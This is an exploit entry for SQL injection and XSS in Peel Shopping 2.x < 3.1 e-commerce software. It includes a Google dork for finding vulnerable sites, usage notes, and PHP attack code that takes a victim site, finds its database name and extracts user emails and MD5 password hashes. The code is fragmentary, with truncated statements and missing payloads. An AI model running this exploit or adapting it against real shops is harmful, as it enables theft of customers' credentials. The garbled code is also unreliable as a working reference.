# Exploit Title: Peel Shopping "catid=" SQL injection
# Google Dork: inurl:/lire/index.php?rubid=
# Date: 2024-10-02
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.peel-shopping.com/
# Software Link: https://github.com/advisto/peel-shopping
# Version: 2.x < 3.1
# Tested on: Windows 10
## USAGE: ##
## 1 ##
##If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ##
## 2 ##
##If you want test this single parameter index.php?catid= leave the field with default.##
## 3 ##
##If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3) ##
## Details: ##
##You can also test the search module affected by XSS. ##
##If you see many iframes are the switch of the tables or parameters;carefully use the ##
##characters '/' in the full path and '-' before the numericals vars. ##
[code] Multiple Vulnerabilities exploit [tested]
Peel Shopping 2.x < 3.1 "catid=" SQL injection
#Peel Shopping 2.x < 3.1 Exploit#
#vuln finder! #
#Code by Emiliano Febbi - 2024 #
( first get db name and later run exploit )
1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=
if($_POST['victim_site']) {
$site = $_POST['victim_site'];
print "#DB_Name:(try-1)
$tags=explode(" | ",$tags[1]);
$cleaning = array(
$ok = "";
$filtred = str_replace($cleaning, $ok, $tags[0]);
print "
print "#DB_Name:(try-2)
$tagss=explode('" href=',$tagss[1]);
$filtreds = str_replace($cleaning, $ok, $tagss[0]);
if($_POST['victim_sitee'] and $_POST['victim_db']) {
$sitee = $_POST['victim_sitee'];
$hack_db = $_POST['victim_db'];
1- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> id=&catid=
2- #ALL @E-Mail and Users: ~table ->utilisateurs-> id=&catid=
3- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> catid=
print "[emails cracked]+md5:
$ress = preg_match_all(
if ($ress) {
foreach(array_unique($matchess[0]) as $emails) {
echo $emails . "
else {
echo "No emails found.";
echo '#Expl-3
if($_POST['hack2']) {
$hackk = $_POST['hack2'];
echo '
echo "2 [#Query interested] -> index.php?rubid=
print "[emails cracked]:
$res = preg_match_all(
if ($res) {
foreach(array_unique($matches[0]) as $email) {
echo $email . "
else {
echo "No emails found.";
if($_POST['site_XSS']) {
$XSS = $_POST['site_XSS'];